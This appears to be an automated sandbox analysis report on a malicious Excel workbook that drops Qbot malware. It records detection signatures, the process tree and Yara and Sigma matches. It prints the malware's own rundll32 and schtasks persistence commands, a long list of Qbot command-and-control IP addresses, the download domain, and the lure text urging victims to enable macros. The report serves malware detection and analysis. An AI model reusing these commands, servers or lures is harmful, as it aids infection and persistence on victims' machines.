Loading ...

Play interactive tourEdit tour

Analysis Report papers (71).xls

Overview

General Information

Sample Name:papers (71).xls
Analysis ID:358604
MD5:540499ef024a652fea8780e11398f03c
SHA1:33da766338fa9fd840b1f43a6330a0af8cfa0a39
SHA256:8dfff9a2ff5cb2b8d70cf43fd0dc7a521570105d623cf28b76f8c66a9a664dd6
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Schedule REGSVR windows binary
Yara detected Qbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2344 cmdline: rundll32 ..\kdfe.vbox,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2328 cmdline: rundll32 ..\kdfe.vbox,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • explorer.exe (PID: 2952 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2908 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2920 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8974-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • regsvr32.exe (PID: 2464 cmdline: regsvr32.exe -s 'C:\Users\user\kdfe.vbox' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2436 cmdline: -s 'C:\Users\user\kdfe.vbox' MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2396 cmdline: regsvr32.exe -s 'C:\Users\user\kdfe.vbox' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2352 cmdline: -s 'C:\Users\user\kdfe.vbox' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"C2 list": ["78.63.226.32:443", "197.51.82.72:443", "193.248.221.184:2222", "95.77.223.148:443", "71.199.192.62:443", "77.211.30.202:995", "80.227.5.69:443", "77.27.204.204:995", "81.97.154.100:443", "173.184.119.153:995", "38.92.225.121:443", "81.150.181.168:2222", "90.65.236.181:2222", "83.110.103.152:443", "73.153.211.227:443", "188.25.63.105:443", "89.137.211.239:995", "202.188.138.162:443", "98.173.34.212:995", "87.202.87.210:2222", "195.12.154.8:443", "47.217.24.69:6881", "182.48.193.200:443", "108.160.123.244:443", "96.57.188.174:2222", "45.118.216.157:443", "84.72.35.226:443", "172.115.177.204:2222", "86.236.77.68:2222", "82.127.125.209:990", "176.181.247.197:443", "97.69.160.4:2222", "90.101.117.122:2222", "189.223.201.91:443", "140.82.49.12:443", "2.7.69.217:2222", "83.110.12.140:2222", "85.132.36.111:2222", "197.45.110.165:995", "149.28.99.97:995", "45.63.107.192:2222", "149.28.98.196:2222", "149.28.99.97:2222", "144.202.38.185:443", "149.28.99.97:443", "45.63.107.192:443", "45.63.107.192:995", "144.202.38.185:2222", "149.28.101.90:995", "149.28.101.90:2222", "149.28.101.90:8443", "45.32.211.207:8443", "149.28.98.196:995", "149.28.98.196:443", "45.32.211.207:995", "149.28.101.90:443", "207.246.77.75:443", "45.77.115.208:8443", "207.246.77.75:995", "207.246.77.75:2222", "45.32.211.207:2222", "45.32.211.207:443", "45.77.115.208:995", "144.202.38.185:995", "45.77.115.208:2222", "207.246.116.237:8443", "207.246.116.237:2222", "207.246.77.75:8443", "207.246.116.237:995", "207.246.116.237:443", "45.77.117.108:443", "45.77.117.108:995", "45.77.117.108:8443", "45.77.117.108:2222", "45.77.115.208:443", "89.3.198.238:443", "2.232.253.79:995", "73.25.124.140:2222", "136.232.34.70:443", "157.131.108.180:443", "217.133.54.140:32100", "195.43.173.70:443", "86.98.93.124:2078", "176.205.222.30:2078", "105.96.8.96:443", "50.29.166.232:995", "27.223.92.142:995", "119.153.62.76:3389", "47.187.115.228:443", "67.6.12.4:443", "65.27.228.247:443", "23.240.70.80:995", "216.201.162.158:443", "139.216.137.189:995", "64.121.114.87:443", "79.129.121.81:995", "172.87.157.235:3389", "75.118.1.141:443", "75.136.26.147:443", "96.250.60.138:443", "50.244.112.106:443", "115.133.243.6:443", "47.196.192.184:443", "45.46.53.140:2222", "105.198.236.101:443", "144.139.166.18:443", "196.151.252.84:443", "71.197.126.250:443", "196.221.207.137:995", "71.117.132.169:443", "74.68.144.202:443", "76.25.142.196:443", "98.240.24.57:443", "144.139.47.206:443", "86.245.46.27:2222", "173.21.10.71:2222", "78.97.207.104:443", "86.220.60.133:2222", "69.245.102.225:443", "94.53.92.42:443", "71.74.12.34:443", "84.247.55.190:8443", "173.25.45.66:443", "46.153.55.149:995", "78.22.58.205:3389", "105.198.236.99:443", "24.152.219.253:995", "82.76.47.211:443", "189.223.234.23:995", "96.37.113.36:993", "47.187.74.181:443", "50.25.89.74:443", "174.104.31.209:443", "199.19.117.131:443", "201.143.235.13:443", "189.146.183.105:443", "181.48.190.78:443", "189.223.97.175:443", "47.22.148.6:443", "173.70.165.101:995", "74.222.204.82:995", "75.67.192.125:443", "32.210.98.6:443", "106.51.52.111:443", "59.90.246.200:443", "70.49.88.199:2222", "186.28.51.27:443", "98.252.118.134:443", "209.210.187.52:995", "189.210.115.207:443"], "Bot id": "tr", "Campaign": "1613385567"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
papers (71).xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4cca2:$s1: Excel
  • 0x4dd06:$s1: Excel
  • 0x36bd:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
papers (71).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2094377277.0000000000300000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000005.00000002.2356101330.00000000003A0000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.explorer.exe.3a0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          4.2.rundll32.exe.300000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
            5.2.explorer.exe.3a0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
              4.2.rundll32.exe.300000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Schedule REGSVR windows binaryShow sources
                Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2952, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52, ProcessId: 2908
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\kdfe.vbox,DllRegisterServer, CommandLine: rundll32 ..\kdfe.vbox,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1108, ProcessCommandLine: rundll32 ..\kdfe.vbox,DllRegisterServer, ProcessId: 2344

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 4.2.rundll32.exe.300000.0.raw.unpackMalware Configuration Extractor: Qbot {"C2 list": ["78.63.226.32:443", "197.51.82.72:443", "193.248.221.184:2222", "95.77.223.148:443", "71.199.192.62:443", "77.211.30.202:995", "80.227.5.69:443", "77.27.204.204:995", "81.97.154.100:443", "173.184.119.153:995", "38.92.225.121:443", "81.150.181.168:2222", "90.65.236.181:2222", "83.110.103.152:443", "73.153.211.227:443", "188.25.63.105:443", "89.137.211.239:995", "202.188.138.162:443", "98.173.34.212:995", "87.202.87.210:2222", "195.12.154.8:443", "47.217.24.69:6881", "182.48.193.200:443", "108.160.123.244:443", "96.57.188.174:2222", "45.118.216.157:443", "84.72.35.226:443", "172.115.177.204:2222", "86.236.77.68:2222", "82.127.125.209:990", "176.181.247.197:443", "97.69.160.4:2222", "90.101.117.122:2222", "189.223.201.91:443", "140.82.49.12:443", "2.7.69.217:2222", "83.110.12.140:2222", "85.132.36.111:2222", "197.45.110.165:995", "149.28.99.97:995", "45.63.107.192:2222", "149.28.98.196:2222", "149.28.99.97:2222", "144.202.38.185:443", "149.28.99.97:443", "45.63.107.192:443", "45.63.107.192:995", "144.202.38.185:2222", "149.28.101.90:995", "149.28.101.90:2222", "149.28.101.90:8443", "45.32.211.207:8443", "149.28.98.196:995", "149.28.98.196:443", "45.32.211.207:995", "149.28.101.90:443", "207.246.77.75:443", "45.77.115.208:8443", "207.246.77.75:995", "207.246.77.75:2222", "45.32.211.207:2222", "45.32.211.207:443", "45.77.115.208:995", "144.202.38.185:995", "45.77.115.208:2222", "207.246.116.237:8443", "207.246.116.237:2222", "207.246.77.75:8443", "207.246.116.237:995", "207.246.116.237:443", "45.77.117.108:443", "45.77.117.108:995", "45.77.117.108:8443", "45.77.117.108:2222", "45.77.115.208:443", "89.3.198.238:443", "2.232.253.79:995", "73.25.124.140:2222", "136.232.34.70:443", "157.131.108.180:443", "217.133.54.140:32100", "195.43.173.70:443", "86.98.93.124:2078", "176.205.222.30:2078", "105.96.8.96:443", "50.29.166.232:995", "27.223.92.142:995", "119.153.62.76:3389", "47.187.115.228:443", "67.6.12.4:443", "65.27.228.247:443", "23.240.70.80:995", "216.201.162.158:443", "139.216.137.189:995", "64.121.114.87:443", "79.129.121.81:995", "172.87.157.235:3389", "75.118.1.141:443", "75.136.26.147:443", "96.250.60.138:443", "50.244.112.106:443", "115.133.243.6:443", "47.196.192.184:443", "45.46.53.140:2222", "105.198.236.101:443", "144.139.166.18:443", "196.151.252.84:443", "71.197.126.250:443", "196.221.207.137:995", "71.117.132.169:443", "74.68.144.202:443", "76.25.142.196:443", "98.240.24.57:443", "144.139.47.206:443", "86.245.46.27:2222", "173.21.10.71:2222", "78.97.207.104:443", "86.220.60.133:2222", "69.245.102.225:443", "94.53.92.42:443", "71.74.12.34:443", "84.247.55.190:8443", "173.25.45.66:443", "46.153.55.149:995", "78.22.58.205:3389", "105.198.236.99:443", "24.152.219.253:995", "82.76.47.211:443", "189.223.234.23:995", "96.37.113.36:993", "47.187.74.181:443", "50.25.89.74:443", "174.104.31.209:443", "199.19.117.131:443", "201.143.235.13:443", "189.146.183.105:443", "181.48.190.78:443", "189.223.97.175:443", "47.22.148.6:443", "
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifMetadefender: Detection: 18%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifReversingLabs: Detection: 89%
                Multi AV Scanner detection for submitted fileShow sources
                Source: papers (71).xlsVirustotal: Detection: 46%Perma Link
                Source: papers (71).xlsReversingLabs: Detection: 44%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifJoe Sandbox ML: detected

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Uses secure TLS version for HTTPS connectionsShow sources
                Source: unknownHTTPS traffic detected: 104.196.7.213:443 -> 192.168.2.22:49167 version: TLS 1.2
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B1217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 1502[1].gif.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: global trafficDNS query: name: remedial.aaua.edu.ng
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.196.7.213:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.196.7.213:443
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: unknownDNS traffic detected: queries for: remedial.aaua.edu.ng
                Source: rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: rundll32.exe, 00000004.00000002.2095412048.0000000002BF0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2356334217.0000000002040000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2356236922.0000000000860000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2100983303.0000000000CA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: regsvr32.exe, 0000000A.00000002.2102220573.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2100622492.0000000000840000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: rundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: rundll32.exe, 00000004.00000002.2095412048.0000000002BF0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2356334217.0000000002040000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2356236922.0000000000860000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2100983303.0000000000CA0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownHTTPS traffic detected: 104.196.7.213:443 -> 192.168.2.22:49167 version: TLS 1.2

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Editing 2CIick on "Enable content" to perform Microsoft Word Decryption Core to start the d
                Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
                Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet."7, 0Protected View Thi
                Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
                Source: Document image extraction number: 3Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
                Source: Document image extraction number: 3Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: papers (71).xlsInitial sample: CALL
                Source: papers (71).xlsInitial sample: EXEC
                Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                Source: papers (71).xlsInitial sample: Sheet size: 4604
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\kdfe.vbox
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0013009C NtAllocateVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130066 NtAllocateVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130285 NtProtectVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001308D9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B3630
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B862B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003AA60D
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003ABA65
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003AC6FD
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003AFBC4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003BB0AF
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003C1488
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B40C2
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003C0D09
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B9566
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B55A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B4981
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B05E8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B1217
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003AF267
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B5A4F
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003BCABD
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003C1E97
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B6AFA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003C3AFF
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003BAB20
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B735C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003BD3B3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B1F8B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003BBBFA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B43F7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003ADBEC
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003BC7C3
                Source: papers (71).xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gif 743677C0B3ADCAAD1C801E7B9AB5B116CA6AAC844976A18520151A2310B7F4D8
                Source: Joe Sandbox ViewDropped File: C:\Users\user\kdfe.vbox 2A6DC00BDCACD9E65A4B99D9D8DD4DB64554A2DB3E5F0A2F9D2702B99D88AC0F
                Source: kdfe.vbox.5.drStatic PE information: No import functions for PE file found
                Source: papers (71).xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@18/12@1/1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B6EC8 MultiByteToWideChar,CoInitializeEx,lstrcpynA,CoInitializeSecurity,lstrcpynA,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,SysAllocString,GetOEMCP,MultiByteToWideChar,lstrcpynA,CoSetProxyBlanket,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\C8CE0000Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{B7826249-FDFD-43D6-956D-968FE05046B6}
                Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{1EAC1A0A-E127-43E1-A141-1FE4F3758196}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC042.tmpJump to behavior
                Source: papers (71).xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: .................................&[.....(.P.............@...............Oz......................................................................
                Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
                Source: papers (71).xlsVirustotal: Detection: 46%
                Source: papers (71).xlsReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52
                Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8974-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service:
                Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
